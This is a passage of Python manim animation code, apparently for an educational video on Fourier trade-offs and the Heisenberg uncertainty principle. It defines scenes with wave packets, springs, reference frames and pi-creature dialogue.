"Consider special relativity \\\\ together with $E = hf$",
target_mode = "hooray",
bubble_kwargs = {"fill_opacity" : 0.9},
),
morty.change, "guilty"
)
self.wait(2)
###
def create_pi_creatures(self):
scale_factor = 0.85
morty = Mortimer().flip()
morty.scale(scale_factor)
morty.to_corner(DOWN+LEFT)
physies = VGroup(*[
PiCreature(color = c).flip()
for c in (GREY, LIGHT_GREY, DARK_GREY)
])
physies.arrange(RIGHT, buff = MED_SMALL_BUFF)
physies.scale(scale_factor)
physies.to_corner(DOWN+RIGHT)
self.add(physies)
return VGroup(morty, *physies)
class SortOfDopplerEffect(PiCreatureScene):
CONFIG = {
"omega" : np.pi,
"arrow_spacing" : 0.25,
}
def setup(self):
PiCreatureScene.setup(self)
rect = self.screen_rect = ScreenRectangle(height = FRAME_HEIGHT)
rect.set_stroke(width = 0)
self.camera = MovingCamera(
rect, **self.camera_config
)
def construct(self):
screen_rect = self.screen_rect
#x-coordinate gives time
t_tracker = VectorizedPoint()
#x-coordinate gives wave number
k_tracker = VectorizedPoint(2*RIGHT)
always_shift(t_tracker, RIGHT, 1)
def get_wave():
t = t_tracker.get_center()[0]
k = k_tracker.get_center()[0]
omega = self.omega
color = interpolate_color(
BLUE, RED, (k-2)/2.0
)
func = lambda x : 0.5*np.cos(omega*t - k*x)
graph = FunctionGraph(
func,
x_min = -5*FRAME_X_RADIUS,
x_max = FRAME_X_RADIUS,
color = color,
)
return VGroup(graph, *[
Arrow(
x*RIGHT, x*RIGHT + func(x)*UP,
color = color
)
for x in np.arange(
-4*FRAME_X_RADIUS, FRAME_X_RADIUS,
self.arrow_spacing
)
])
return
wave = get_wave()
wave_update = Mobject.add_updater(
wave, lambda w : Transform(w, get_wave()).update(1)
)
rect = ScreenRectangle(height = 2)
rect.to_edge(RIGHT)
always_shift(rect, LEFT, 1)
rect_movement = rect
randy = self.pi_creature
randy_look_at = Mobject.add_updater(
randy, lambda r : r.look_at(rect)
)
ref_frame1 = TextMobject("Reference frame 1")
# ref_frame1.next_to(randy, UP, aligned_edge = LEFT)
ref_frame1.to_edge(UP)
ref_frame2 = TextMobject("Reference frame 2")
ref_frame2.next_to(rect, UP)
# ref_frame2.set_fill(opacity = 0)
ref_frame2_follow = Mobject.add_updater(
ref_frame2, lambda m : m.next_to(rect, UP)
)
ref_frame_1_continual_anim = ContinualAnimation(ref_frame1)
self.add(
t_tracker, wave_update, rect_movement, randy_look_at,
ref_frame2_follow, ref_frame_1_continual_anim
)
self.add(ref_frame1)
self.play(randy.change, "pondering")
self.wait(4)
start_height = screen_rect.get_height()
start_center = screen_rect.get_center()
self.play(
UpdateFromAlphaFunc(
screen_rect,
lambda m, a : m.move_to(
interpolate(start_center, rect.get_center(), a)
)
),
k_tracker.shift, 2*RIGHT,
)
self.play(
MaintainPositionRelativeTo(
screen_rect, rect,
run_time = 4
),
)
self.play(
screen_rect.move_to, rect.get_right()+FRAME_X_RADIUS*LEFT,
k_tracker.shift, 2*LEFT,
)
#Frequency words
temporal_frequency = TextMobject("Temporal", "frequency")
spatial_frequency = TextMobject("Spatial", "frequency")
temporal_frequency.move_to(screen_rect).to_edge(UP)
spatial_frequency.next_to(temporal_frequency, DOWN)
cross = Cross(temporal_frequency[0])
time = TextMobject("Time")
space = TextMobject("Space")
time.next_to(temporal_frequency, RIGHT, buff = 2)
space.next_to(time, DOWN)
space.align_to(spatial_frequency)
self.play(FadeIn(temporal_frequency))
self.play(ShowCreation(cross))
self.play(Write(spatial_frequency))
self.wait()
self.play(FadeIn(time), FadeIn(space))
self.play(
Transform(time, space),
Transform(space, time),
lag_ratio = 0.5,
run_time = 1,
)
self.play(FadeOut(time), FadeOut(space))
self.wait(3)
###
def create_pi_creature(self):
return Randolph().scale(0.5).to_corner(DOWN+LEFT)
class HangingWeightsScene(MovingCameraScene):
CONFIG = {
"frequency" : 0.5,
"ceiling_radius" : 3*FRAME_X_RADIUS,
"n_springs" : 72,
"amplitude" : 0.6,
"spring_radius" : 0.15,
}
def construct(self):
self.setup_springs()
self.setup_weights()
self.introduce()
self.show_analogy_with_electron()
self.metaphor_for_something()
self.moving_reference_frame()
def setup_springs(self):
ceiling = self.ceiling = Line(LEFT, RIGHT)
ceiling.scale(self.ceiling_radius)
ceiling.to_edge(UP, buff = LARGE_BUFF)
self.add(ceiling)
def get_spring(alpha, height = 2):
t_max = 6.5
r = self.spring_radius
s = (height - r)/(t_max**2)
spring = ParametricFunction(
lambda t : op.add(
r*(np.sin(TAU*t)*RIGHT+np.cos(TAU*t)*UP),
s*((t_max - t)**2)*DOWN,
),
t_min = 0, t_max = t_max,
color = WHITE,
stroke_width = 2,
)
spring.alpha = alpha
spring.move_to(ceiling.point_from_proportion(alpha), UP)
spring.color_using_background_image("grey_gradient")
return spring
alphas = np.linspace(0, 1, self.n_springs)
bezier([0, 1, 0, 1])
springs = self.springs = VGroup(*list(map(get_spring, alphas)))
k_tracker = self.k_tracker = VectorizedPoint()
t_tracker = self.t_tracker = VectorizedPoint()
always_shift(t_tracker, RIGHT, 1)
self.t_tracker_walk = t_tracker
equilibrium_height = springs.get_height()
def update_springs(springs):
for spring in springs:
k = k_tracker.get_center()[0]
t = t_tracker.get_center()[0]
f = self.frequency
x = spring.get_top()[0]
A = self.amplitude
d_height = A*np.cos(TAU*f*t - k*x)
new_spring = get_spring(spring.alpha, 2+d_height)
Transform(spring, new_spring).update(1)
spring_update_anim = Mobject.add_updater(springs, update_springs)
self.spring_update_anim = spring_update_anim
spring_update_anim.update(0)
self.play(
ShowCreation(ceiling),
LaggedStartMap(ShowCreation, springs)
)
def setup_weights(self):
weights = self.weights = VGroup()
weight_anims = weight_anims = []
for spring in self.springs:
x = spring.get_top()[0]
mass = np.exp(-0.1*x**2)
weight = Circle(radius = 0.15)
weight.start_radius = 0.15
weight.target_radius = 0.25*mass #For future update
weight.spring = spring
weight_anim = Mobject.add_updater(
weight, lambda w : w.move_to(w.spring.get_bottom())
)
weight_anim.update(0)
weight_anims.append(weight_anim)
weights.add(weight)
weights.set_fill(opacity = 1)
weights.set_color_by_gradient(BLUE_D, BLUE_E, BLUE_D)
weights.set_stroke(WHITE, 1)
self.play(LaggedStartMap(GrowFromCenter, weights))
self.add(self.t_tracker_walk)
self.add(self.spring_update_anim)
self.add(*weight_anims)
def introduce(self):
arrow = Arrow(4*LEFT, LEFT)
arrows = VGroup(arrow, arrow.copy().flip(about_point = ORIGIN))
arrows.set_color(WHITE)
self.wait(3)
self.play(*list(map(GrowArrow, arrows)))
self.play(*[
UpdateFromAlphaFunc(
weight, lambda w, a : w.set_width(
2*interpolate(w.start_radius, w.target_radius, a)
),
run_time = 2
)
for weight in self.weights
])
self.play(FadeOut(arrows))
self.wait(3)
def show_analogy_with_electron(self):
words = TextMobject(
"Analogous to the energy of a particle \\\\",
"(in the sense of $E=mc^2$)"
)
words.move_to(DOWN)
self.play(Write(words))
self.wait(3)
self.play(FadeOut(words))
def metaphor_for_something(self):
de_broglie = ImageMobject("de_Broglie")
de_broglie.set_height(3.5)
de_broglie.to_corner(DOWN+RIGHT)
words = TextMobject("""
If a photon's energy is carried as a wave \\\\
is this true for any particle?
""")
words.next_to(de_broglie, LEFT)
einstein = ImageMobject("Einstein")
einstein.match_height(de_broglie)
einstein.to_corner(DOWN+LEFT)
for picture in de_broglie, einstein:
picture.backdrop = Rectangle()
picture.backdrop.replace(picture, stretch = True)
picture.backdrop.set_fill(BLACK, 1)
picture.backdrop.set_stroke(BLACK, 0)
self.play(
Animation(de_broglie.backdrop, remover = True),
FadeIn(de_broglie)
)
self.play(Write(words))
self.wait(7)
self.play(
FadeOut(words),
Animation(einstein.backdrop, remover = True),
FadeIn(einstein)
)
self.wait(2)
self.de_broglie = de_broglie
self.einstein = einstein
def moving_reference_frame(self):
rect = ScreenRectangle(height = 2.1*FRAME_Y_RADIUS)
rect_movement = always_shift(rect, direction = LEFT, rate = 2)
camera_frame = self.camera_frame
self.add(rect)
self.play(
Animation(self.de_broglie.backdrop, remover = True),
FadeOut(self.de_broglie),
Animation(self.einstein.backdrop, remover = True),
FadeOut(self.einstein),
)
self.play(camera_frame.scale, 3, {"about_point" : 2*UP})
self.play(rect.shift, FRAME_WIDTH*RIGHT, path_arc = -TAU/2)
self.add(rect_movement)
self.wait(3)
def zoom_into_reference_frame():
original_height = camera_frame.get_height()
original_center = camera_frame.get_center()
self.play(
UpdateFromAlphaFunc(
camera_frame, lambda c, a : c.set_height(
interpolate(original_height, 0.95*rect.get_height(), a)
).move_to(
interpolate(original_center, rect.get_center(), a)
)
),
ApplyMethod(self.k_tracker.shift, RIGHT)
)
self.play(MaintainPositionRelativeTo(
camera_frame, rect,
run_time = 6
))
self.play(
camera_frame.set_height, original_height,
camera_frame.move_to, original_center,
ApplyMethod(self.k_tracker.shift, LEFT)
)
zoom_into_reference_frame()
self.wait()
self.play(
UpdateFromAlphaFunc(rect, lambda m, a : m.set_stroke(width = 2*(1-a)))
)
index = int(0.5*len(self.springs))
weights = VGroup(self.weights[index], self.weights[index+4])
flashes = list(map(self.get_peak_flash_anim, weights))
weights.save_state()
weights.set_fill(RED)
self.add(*flashes)
self.wait(5)
rect.align_to(camera_frame, RIGHT)
self.play(UpdateFromAlphaFunc(rect, lambda m, a : m.set_stroke(width = 2*a)))
randy = Randolph(mode = "pondering")
randy.look(UP+RIGHT)
de_broglie = ImageMobject("de_Broglie")
de_broglie.set_height(6)
de_broglie.next_to(4*DOWN, DOWN)
self.add(
Mobject.add_updater(
randy, lambda m : m.next_to(
rect.get_corner(DOWN+LEFT), UP+RIGHT, MED_LARGE_BUFF,
).look_at(weights)
),
de_broglie
)
self.wait(2)
zoom_into_reference_frame()
self.wait(8)
###
def get_peak_flash_anim(self, weight):
mobject = Mobject() #Dummy
mobject.last_y = 0
mobject.last_dy = 0
mobject.curr_anim = None
mobject.curr_anim_time = 0
mobject.time_since_last_flash = 0
def update(mob, dt):
mob.time_since_last_flash += dt
point = weight.get_center()
y = point[1]
mob.dy = y - mob.last_y
different_dy = np.sign(mob.dy) != np.sign(mob.last_dy)
if different_dy and mob.time_since_last_flash > 0.5:
mob.curr_anim = Flash(
VectorizedPoint(point),
flash_radius = 0.5,
line_length = 0.3,
run_time = 0.2,
)
mob.submobjects = [mob.curr_anim.mobject]
mob.time_since_last_flash = 0
mob.last_y = float(y)
mob.last_dy = float(mob.dy)
##
if mob.curr_anim:
mob.curr_anim_time += dt
if mob.curr_anim_time > mob.curr_anim.run_time:
mob.curr_anim = None
mob.submobjects = []
mob.curr_anim_time = 0
return
mob.curr_anim.update(mob.curr_anim_time/mob.curr_anim.run_time)
return Mobject.add_updater(mobject, update)
class MinutPhysicsWrapper(Scene):
def construct(self):
logo = ImageMobject("minute_physics_logo", invert = True)
logo.to_corner(UP+LEFT)
self.add(logo)
title = TextMobject("Minute Physics on special relativity")
title.to_edge(UP).shift(MED_LARGE_BUFF*RIGHT)
screen_rect = ScreenRectangle()
screen_rect.set_width(title.get_width() + LARGE_BUFF)
screen_rect.next_to(title, DOWN)
self.play(ShowCreation(screen_rect))
self.play(Write(title))
self.wait(2)
class WhatDoesTheFourierTradeoffTellUs(TeacherStudentsScene):
def construct(self):
self.teacher_says(
"So! What does \\\\ the Fourier trade-off \\\\ tell us?",
target_mode = "surprised",
bubble_kwargs = {"width" : 4, "height" : 3}
)
self.change_student_modes(*["thinking"]*3)
self.wait(4)
class FourierTransformOfWaveFunction(Scene):
CONFIG = {
"wave_stroke_width" : 3,
"wave_color" : BLUE,
}
def construct(self):
self.show_wave_packet()
self.take_fourier_transform()
self.show_correlations_with_pure_frequencies()
self.this_is_momentum()
self.show_tradeoff()
def setup(self):
self.x0_tracker = ValueTracker(-3)
self.k_tracker = ValueTracker(1)
self.a_tracker = ExponentialValueTracker(0.5)
def show_wave_packet(self):
axes = Axes(
x_min = 0, x_max = 12,
y_min = -1, y_max = 1,
y_axis_config = {
"tick_frequency" : 0.5
}
)
position_label = TextMobject("Position")
position_label.next_to(axes.x_axis.get_right(), UP)
axes.add(position_label)
axes.center().to_edge(UP, buff = LARGE_BUFF)
wave = self.get_wave(axes)
wave_update_animation = UpdateFromFunc(
wave, lambda w : Transform(w, self.get_wave(axes)).update(1)
)
self.add(axes, wave)
self.play(
self.x0_tracker.set_value, 5,
wave_update_animation,
run_time = 3,
)
self.wait()
self.wave_function = wave.underlying_function
self.wave_update_animation = wave_update_animation
self.wave = wave
self.axes = axes
def take_fourier_transform(self):
wave = self.wave
wave_update_animation = self.wave_update_animation
frequency_axes = Axes(
x_min = 0, x_max = 3,
x_axis_config = {
"unit_size" : 4,
"tick_frequency" : 0.25,
"numbers_with_elongated_ticks" : [1, 2]
},
y_min = -0.15,
y_max = 0.15,
y_axis_config = {
"unit_size" : 7.5,
"tick_frequency" : 0.05,
}
)
label = self.frequency_x_axis_label = TextMobject("Spatial frequency")
label.next_to(frequency_axes.x_axis.get_right(), UP)
frequency_axes.add(label)
frequency_axes.move_to(self.axes, LEFT)
frequency_axes.to_edge(DOWN, buff = LARGE_BUFF)
label.shift_onto_screen()
def get_wave_function_fourier_graph():
return get_fourier_graph(
frequency_axes, self.get_wave_func(),
t_min = 0, t_max = 15,
)
fourier_graph = get_wave_function_fourier_graph()
self.fourier_graph_update_animation = UpdateFromFunc(
fourier_graph, lambda m : Transform(
m, get_wave_function_fourier_graph()
).update(1)
)
wave_copy = wave.copy()
wave_copy.generate_target()
wave_copy.target.move_to(fourier_graph, LEFT)
wave_copy.target.fade(1)
fourier_graph.save_state()
fourier_graph.move_to(wave, LEFT)
fourier_graph.fade(1)
arrow = Arrow(
self.axes.coords_to_point(5, -1),
frequency_axes.coords_to_point(1, 0.1),
color = YELLOW,
)
fourier_label = TextMobject("Fourier Transform")
fourier_label.next_to(arrow.get_center(), RIGHT)
self.play(ReplacementTransform(
self.axes.copy(), frequency_axes
))
self.play(
MoveToTarget(wave_copy, remover = True),
fourier_graph.restore,
GrowArrow(arrow),
Write(fourier_label, run_time = 1),
)
self.wait()
self.frequency_axes = frequency_axes
self.fourier_graph = fourier_graph
self.fourier_label = VGroup(arrow, fourier_label)
def show_correlations_with_pure_frequencies(self):
frequency_axes = self.frequency_axes
axes = self.axes
sinusoid = axes.get_graph(
lambda x : 0.5*np.cos(TAU*x),
x_min = -FRAME_X_RADIUS, x_max = 3*FRAME_X_RADIUS,
)
sinusoid.to_edge(UP, buff = SMALL_BUFF)
v_line = DashedLine(1.5*UP, ORIGIN, color = YELLOW)
v_line.move_to(frequency_axes.coords_to_point(1, 0), DOWN)
f_equals = TexMobject("f = ")
freq_decimal = DecimalNumber(1)
freq_decimal.next_to(f_equals, RIGHT, buff = SMALL_BUFF)
freq_label = VGroup(f_equals, freq_decimal)
freq_label.next_to(
v_line, UP, SMALL_BUFF,
submobject_to_align = f_equals[0]
)
self.play(
ShowCreation(sinusoid),
ShowCreation(v_line),
Write(freq_label, run_time = 1),
FadeOut(self.fourier_label)
)
last_f = 1
for f in 1.4, 0.7, 1:
self.play(
sinusoid.stretch,f/last_f, 0,
{"about_point" : axes.coords_to_point(0, 0)},
v_line.move_to, frequency_axes.coords_to_point(f, 0), DOWN,
MaintainPositionRelativeTo(freq_label, v_line),
ChangeDecimalToValue(freq_decimal, f),
run_time = 3,
)
last_f = f
self.play(*list(map(FadeOut, [
sinusoid, v_line, freq_label
])))
def this_is_momentum(self):
formula = TexMobject("p", "=", "h", "\\xi")
formula.set_color_by_tex_to_color_map({
"p" : BLUE,
"xi" : YELLOW,
})
formula.next_to(
self.frequency_x_axis_label, UP
)
f_max = 0.12
brace = Brace(Line(2*LEFT, 2*RIGHT), UP)
brace.move_to(self.frequency_axes.coords_to_point(1, f_max), DOWN)
words = TextMobject("This wave \\\\ describes momentum")
words.next_to(brace, UP)
self.play(Write(formula))
self.wait()
self.play(
GrowFromCenter(brace),
Write(words)
)
brace.add(words)
for k in 2, 0.5, 1:
self.play(
self.k_tracker.set_value, k,
self.wave_update_animation,
self.fourier_graph_update_animation,
UpdateFromFunc(
brace, lambda b : b.move_to(
self.frequency_axes.coords_to_point(
self.k_tracker.get_value(),
f_max,
),
DOWN
)
),
run_time = 2
)
self.wait()
self.play(*list(map(FadeOut, [brace, words, formula])))
def show_tradeoff(self):
for a in 5, 0.1, 0.01, 10, 0.5:
self.play(
ApplyMethod(
self.a_tracker.set_value, a,
run_time = 2
),
self.wave_update_animation,
self.fourier_graph_update_animation
)
self.wait()
##
def get_wave_func(self):
x0 = self.x0_tracker.get_value()
k = self.k_tracker.get_value()
a = self.a_tracker.get_value()
A = a**(0.25)
return lambda x : A*np.cos(TAU*k*x)*np.exp(-a*(x - x0)**2)
def get_wave(self, axes):
return axes.get_graph(
self.get_wave_func(),
color = self.wave_color,
stroke_width = self.wave_stroke_width
)
class DopplerComparisonTodos(TODOStub):
CONFIG = {
"message" : """
Insert some Doppler footage,
insert some hanging spring scene,
insert position-momentum Fourier trade-off
"""
}
class MusicalNote(AddingPureFrequencies):
def construct(self):
speaker = self.speaker = SVGMobject(file_name = "speaker")
speaker.move_to(2*DOWN)
randy = self.pi_creature
axes = Axes(
x_min = 0, x_max = 10,
y_min = -1.5, y_max = 1.5
)
axes.center().to_edge(UP)
time_label = TextMobject("Time")
time_label.next_to(axes.x_axis.get_right(), UP)
axes.add(time_label)
graph = axes.get_graph(
lambda x : op.mul(
np.exp(-0.2*(x-4)**2),
0.3*(np.cos(2*TAU*x) + np.cos(3*TAU*x) + np.cos(5*TAU*x)),
),
)
graph.set_color(BLUE)
v_line = DashedLine(ORIGIN, 0.5*UP)
v_line_update = UpdateFromFunc(
v_line, lambda l : l.put_start_and_end_on_with_projection(
graph.points[-1],
axes.x_axis.number_to_point(
axes.x_axis.point_to_number(graph.points[-1])
)
)
)
self.add(speaker, axes)
self.play(
randy.change, "pondering",
self.get_broadcast_animation(n_circles = 6, run_time = 5),
self.get_broadcast_animation(n_circles = 12, run_time = 5),
ShowCreation(graph, run_time = 5, rate_func=linear),
v_line_update
)
self.wait(2)
class AskAboutUncertainty(TeacherStudentsScene):
def construct(self):
self.student_says(
"What does this have \\\\ to do with ``certainty''",
bubble_kwargs = {"direction" : LEFT},
student_index = 2
)
self.play(PiCreatureSays(
self.students[0],
"What even are \\\\ these waves?",
target_mode = "confused"
))
self.wait(2)
class ProbabalisticDetection(FourierTransformOfWaveFunction):
CONFIG = {
"wave_stroke_width" : 2,
}
def construct(self):
self.setup_wave()
self.detect_only_single_points()
self.show_probability_distribution()
self.show_concentration_of_the_wave()
def setup_wave(self):
axes = Axes(
x_min = 0, x_max = 10,
y_min = -0.5, y_max = 1.5,
y_axis_config = {
"unit_size" : 1.5,
"tick_frequency" : 0.25,
}
)
axes.set_stroke(width = 2)
axes.center()
self.x0_tracker.set_value(5)
self.k_tracker.set_value(1)
self.a_tracker.set_value(0.2)
wave = self.get_wave(axes)
self.wave_update_animation = UpdateFromFunc(
wave, lambda w : Transform(w, self.get_wave(axes)).update(1)
)
self.k_tracker.save_state()
self.k_tracker.set_value(0)
bell_curve = self.get_wave(axes)
self.k_tracker.restore()
bell_curve.set_stroke(width = 0)
bell_curve.set_fill(BLUE, opacity = 0.5)
squared_bell_curve = axes.get_graph(
lambda x : bell_curve.underlying_function(x)**2
).match_style(bell_curve)
self.set_variables_as_attrs(
axes, wave, bell_curve, squared_bell_curve
)
def detect_only_single_points(self):
particle = ProbabalisticDotCloud(
n_copies = 100,
fill_opacity = 0.05,
time_per_change = 0.05,
)
particle.mobject[0].set_fill(BLUE, opacity = 1)
gdw = particle.gaussian_distribution_wrapper
rect = Rectangle(
stroke_width = 0,
height = 0.5,
width = 2,
)
rect.set_fill(YELLOW, 0.3)
rect.move_to(self.axes.coords_to_point(self.x0_tracker.get_value(), 0))
brace = Brace(rect, UP, buff = 0)
question = TextMobject("Do we detect the particle \\\\ in this region?")
question.next_to(brace, UP)
question.add_background_rectangle()
rect.save_state()
rect.stretch(0, 0)
gdw_anim = Mobject.add_updater(
gdw, lambda m : m.set_width(
2.0/(self.a_tracker.get_value()**(0.5))
).move_to(rect)
)
self.add(rect, brace, question)
yes = TextMobject("Yes").set_color(GREEN)
no = TextMobject("No").set_color(RED)
for word in yes, no:
word.next_to(rect, DOWN)
# word.add_background_rectangle()
answer = VGroup()
def update_answer(answer):
px = particle.mobject[0].get_center()[0]
lx = rect.get_left()[0]
rx = rect.get_right()[0]
if lx < px < rx:
answer.submobjects = [yes]
else:
answer.submobjects = [no]
answer_anim = Mobject.add_updater(answer, update_answer)
self.add(gdw_anim, particle)
self.play(
GrowFromCenter(brace),
rect.restore,
Write(question)
)
self.wait()
self.add(answer_anim)
self.wait(4)
self.add_foreground_mobjects(answer, particle.mobject)
self.question_group = VGroup(question, brace)
self.particle = particle
self.rect = rect
def show_probability_distribution(self):
axes = self.axes
wave = self.wave
bell_curve = self.bell_curve
question_group = self.question_group
gdw = self.particle.gaussian_distribution_wrapper
rect = self.rect
v_lines = VGroup(*[
DashedLine(ORIGIN, 3*UP).move_to(point, DOWN)
for point in (rect.get_left(), rect.get_right())
])
self.play(
FadeIn(VGroup(axes, wave)),
question_group.next_to, v_lines, UP, {"buff" : 0},
*list(map(ShowCreation, v_lines))
)
self.wait(10)
def show_concentration_of_the_wave(self):
self.play(
self.a_tracker.set_value, 5,
self.wave_update_animation,
)
self.wait(10)
class HeisenbergCommentTodos(TODOStub):
CONFIG = {
"message" : "Insert position-momentum trade-off"
}
class HeisenbergPetPeeve(PiCreatureScene):
def construct(self):
morty, other = self.pi_creatures
particle = ProbabalisticDotCloud()
gdw = particle.gaussian_distribution_wrapper
gdw.to_edge(UP, buff = LARGE_BUFF)
gdw.stretch_to_fit_width(3)
gdw.rotate(3*DEGREES)
self.add(particle)
self.wait()
self.play(PiCreatureSays(
other, """
According to the H.U.P., the \\\\
universe is unknowable!
""",
target_mode = "speaking"
))
self.play(morty.change, "angry")
self.wait(3)
self.play(
PiCreatureSays(
morty, "Well, yes and no",
target_mode = "sassy",
),
RemovePiCreatureBubble(
other, target_mode = "erm"
)
)
self.wait(4)
###
def create_pi_creatures(self):
morty = Mortimer()
morty.to_corner(DOWN+RIGHT)
other = PiCreature(color = MAROON_E)
other.to_edge(DOWN).shift(3*LEFT)
return VGroup(morty, other)
class OneLevelDeeper(Scene):
def construct(self):
heisenberg = ImageMobject("Heisenberg")
heisenberg.to_corner(UP+LEFT)
self.add(heisenberg)
hup_words = TextMobject("Heisenberg's uncertainty principle")
wave_words = TextMobject("Interpretation of the wave function")
arrow = Vector(UP)
group = VGroup(hup_words, arrow, wave_words)
group.arrange(DOWN)
randomness = ProbabalisticMobjectCloud(
TextMobject("Randomness"),
n_copies = 5,
time_per_change = 0.05
)
gdw = randomness.gaussian_distribution_wrapper
gdw.rotate(TAU/4)
gdw.set_height(1)
# gdw.set_width(4)
gdw.next_to(hup_words, UP, MED_LARGE_BUFF)
self.add(hup_words, randomness)
self.wait(4)
self.play(
FadeIn(wave_words),
GrowArrow(arrow),
ApplyMethod(
gdw.next_to, wave_words, DOWN, MED_LARGE_BUFF,
path_arc = TAU/2,
)
)
self.wait(6)
class BetterTranslation(TeacherStudentsScene):
def construct(self):
english_term = TextMobject("Uncertainty principle")
german_word = TextMobject("Unschärferelation")
translation = TextMobject("Unsharpness relation")
to_german_words = TextMobject("In German")
to_german_words.scale(0.5)
to_german_arrow = Vector(DOWN, color = WHITE, buff = SMALL_BUFF)
to_german_words.next_to(to_german_arrow, RIGHT, SMALL_BUFF)
to_german_words.set_color(YELLOW)
to_german_group = VGroup(to_german_arrow, to_german_words)
translation_words = TextMobject("Literal translation")
translation_words.scale(0.5)
translation_arrow = Vector(DOWN, color = WHITE, buff = SMALL_BUFF)
translation_words.next_to(translation_arrow, LEFT, SMALL_BUFF)
translation_words.set_color(YELLOW)
translation_group = VGroup(translation_arrow, translation_words)
english_term.next_to(self.teacher, UP+LEFT)
english_term.save_state()
english_term.shift(DOWN)
english_term.fade(1)
self.play(
english_term.restore,
self.get_student_changes(*["pondering"]*3)
)
self.wait()
german_word.move_to(english_term)
to_german_group.next_to(
german_word, UP,
submobject_to_align = to_german_arrow
)
self.play(
self.teacher.change, "raise_right_hand",
english_term.next_to, to_german_arrow, UP
)
self.play(
GrowArrow(to_german_arrow),
FadeIn(to_german_words),
ReplacementTransform(
english_term.copy().fade(1),
german_word
)
)
self.wait(2)
group = VGroup(english_term, to_german_group, german_word)
translation.move_to(german_word)
translation_group.next_to(
german_word, UP,
submobject_to_align = translation_arrow
)
self.play(
group.next_to, translation_arrow, UP,
)
self.play(
GrowArrow(translation_arrow),
FadeIn(translation_words),
ReplacementTransform(
german_word.copy().fade(1),
translation
)
)
self.change_student_modes(*["happy"]*3)
self.wait(2)
class ThinkOfHeisenbergUncertainty(PiCreatureScene):
def construct(self):
morty = self.pi_creature
morty.center().to_edge(DOWN).shift(LEFT)
dot_cloud = ProbabalisticDotCloud()
dot_gdw = dot_cloud.gaussian_distribution_wrapper
dot_gdw.set_width(1)
dot_gdw.rotate(TAU/8)
dot_gdw.move_to(FRAME_X_RADIUS*RIGHT/2),
vector_cloud = ProbabalisticVectorCloud(
center_func = dot_gdw.get_center
)
vector_gdw = vector_cloud.gaussian_distribution_wrapper
vector_gdw.set_width(0.1)
vector_gdw.rotate(TAU/8)
vector_gdw.next_to(dot_gdw, UP+LEFT, LARGE_BUFF)
time_tracker = ValueTracker(0)
self.add()
freq = 1
continual_anims = [
always_shift(time_tracker, direction = RIGHT, rate = 1),
Mobject.add_updater(
dot_gdw,
lambda d : d.set_width(
(np.cos(freq*time_tracker.get_value()) + 1.1)/2
)
),
Mobject.add_updater(
vector_gdw,
lambda d : d.set_width(
(-np.cos(freq*time_tracker.get_value()) + 1.1)/2
)
),
dot_cloud, vector_cloud
]
self.add(*continual_anims)
position, momentum, time, frequency = list(map(TextMobject, [
"Position", "Momentum", "Time", "Frequency"
]))
VGroup(position, time).set_color(BLUE)
VGroup(momentum, frequency).set_color(YELLOW)
groups = VGroup()
for m1, m2 in (position, momentum), (time, frequency):
arrow = TexMobject("\\updownarrow").scale(1.5)
group = VGroup(m1, arrow, m2)
group.arrange(DOWN)
lp, rp = parens = TexMobject("\\big(\\big)")
parens.stretch(1.5, 1)
parens.match_height(group)
lp.next_to(group, LEFT, buff = SMALL_BUFF)
rp.next_to(group, RIGHT, buff = SMALL_BUFF)
group.add(parens)
groups.add(group)
arrow = TexMobject("\\Leftrightarrow").scale(2)
groups.submobjects.insert(1, arrow)
groups.arrange(RIGHT)
groups.next_to(morty, UP+RIGHT, LARGE_BUFF)
groups.shift_onto_screen()
self.play(PiCreatureBubbleIntroduction(
morty, "Heisenberg \\\\ uncertainty \\\\ principle",
bubble_class = ThoughtBubble,
bubble_kwargs = {"height" : 4, "width" : 4, "direction" : RIGHT},
target_mode = "pondering"
))
self.wait()
self.play(morty.change, "confused", dot_gdw)
self.wait(10)
self.play(
ApplyMethod(
VGroup(dot_gdw, vector_gdw ).shift,
FRAME_X_RADIUS*RIGHT,
rate_func = running_start
)
)
self.remove(*continual_anims)
self.play(
morty.change, "raise_left_hand", groups,
FadeIn(
groups,
lag_ratio = 0.5,
run_time = 3,
)
)
self.wait(2)
# End things
class PatreonMention(PatreonThanks):
def construct(self):
morty = Mortimer()
morty.next_to(ORIGIN, DOWN)
patreon_logo = PatreonLogo()
patreon_logo.to_edge(UP)
thank_you = TextMobject("Thank you.")
thank_you.next_to(patreon_logo, DOWN)
self.play(
DrawBorderThenFill(patreon_logo),
morty.change, "gracious"
)
self.play(Write(thank_you))
self.wait(3)
class Promotion(PiCreatureScene):
CONFIG = {
"camera_class" : ThreeDCamera,
"seconds_to_blink" : 5,
}
def construct(self):
aops_logo = AoPSLogo()
aops_logo.next_to(self.pi_creature, UP+LEFT)
url = TextMobject(
"AoPS.com/", "3b1b",
arg_separator = ""
)
url.to_corner(UP+LEFT)
url_rect = Rectangle(color = BLUE)
url_rect.replace(
url.get_part_by_tex("3b1b"),
stretch = True
)
url_rect.stretch_in_place(1.1, dim = 1)
rect = Rectangle(height = 9, width = 16)
rect.set_height(4.5)
rect.next_to(url, DOWN)
rect.to_edge(LEFT)
rect.set_stroke(width = 0)
mathy = Mathematician()
mathy.flip()
mathy.to_corner(DOWN+RIGHT)
morty = self.pi_creature
morty.save_state()
book = ImageMobject("AoPS_volume_2")
book.set_height(2)
book.next_to(mathy, UP+LEFT).shift(MED_LARGE_BUFF*LEFT)
mathy.get_center = mathy.get_top
words = TextMobject("""
Interested in working for \\\\
one of my favorite math\\\\
education companies?
""", alignment = "")
words.to_edge(UP)
arrow = Arrow(
aops_logo.get_top(),
morty.get_top(),
path_arc = -0.4*TAU,
stroke_width = 5,
tip_length = 0.5,
)
arrow.tip.shift(SMALL_BUFF*DOWN)
self.add(words)
self.play(
self.pi_creature.change_mode, "raise_right_hand",
*[
DrawBorderThenFill(
submob,
run_time = 2,
rate_func = squish_rate_func(double_smooth, a, a+0.5)
)
for submob, a in zip(aops_logo, np.linspace(0, 0.5, len(aops_logo)))
]
)
self.play(
words.scale, 0.75,
words.next_to, url, DOWN, LARGE_BUFF,
words.shift_onto_screen,
Write(url),
)
self.wait(2)
self.play(
LaggedStartMap(
ApplyFunction, aops_logo,
lambda mob : (lambda m : m.shift(0.2*UP).set_color(YELLOW), mob),
rate_func = there_and_back,
run_time = 1,
),
morty.change, "thinking"
)
self.wait()
self.play(ShowCreation(arrow))
self.play(FadeOut(arrow))
self.wait()
# To teacher
self.play(
morty.change_mode, "plain",
morty.flip,
morty.scale, 0.7,
morty.next_to, mathy, LEFT, LARGE_BUFF,
morty.to_edge, DOWN,
FadeIn(mathy),
)
self.play(
PiCreatureSays(
